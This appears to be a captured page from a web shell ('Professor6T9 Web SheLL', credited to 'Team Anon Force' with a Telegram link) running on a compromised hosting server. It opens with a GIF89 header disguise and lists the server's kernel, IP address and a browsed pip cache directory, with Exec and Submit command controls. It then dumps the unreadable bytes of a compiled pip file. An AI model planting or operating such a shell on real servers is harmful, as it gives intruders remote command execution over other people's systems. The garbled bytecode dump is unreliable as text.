GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
__pycache__
[ HOME ]
Exec
Submit
wheel_builder.cpython-311.pyc
� L�i2# � � � d Z ddlmZ ddlZddlZddlZddlmZ ddl m Z ddlmZm Z ddlmZmZ ddlmZ dd lmZmZ dd lmZmZ ddlmZ ddlmZ dd lmZ ddlm Z ddl!m"Z" ddl#m$Z$ ddl%m&Z&m'Z' ddl(m)Z) ddl*m+Z+ ej, e-� � Z. ej/ dej0 � � Z1e2e3e" e3e" f Z4d.d�Z5d/d�Z6d0d �Z7d1d#�Z8d2d(�Z9d3d)�Z:d4d-�Z;dS )5z:Orchestrator for building wheels from InstallRequirements.� )�annotationsN)�Iterable)�TemporaryDirectory)�canonicalize_name�canonicalize_version)�InvalidVersion�Version)� WheelCache)�InvalidWheelFilename�UnsupportedWheel)�FilesystemWheel�get_wheel_distribution)�Link)�Wheel)�build_wheel_pep517)�build_wheel_editable)�InstallRequirement)� indent_log)� ensure_dir� hash_file)�path_to_url)�vcsz([a-z0-9_.]+)-([a-z0-9_.!+-]+)�s�str�return�boolc �P � t t � | � � � � S )zjDetermine whether the string looks like an egg_info. :param s: The string to parse. E.g. foo-2.1 )r �_egg_info_re�search)r s �{/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/wheel_builder.py�_contains_egg_infor! "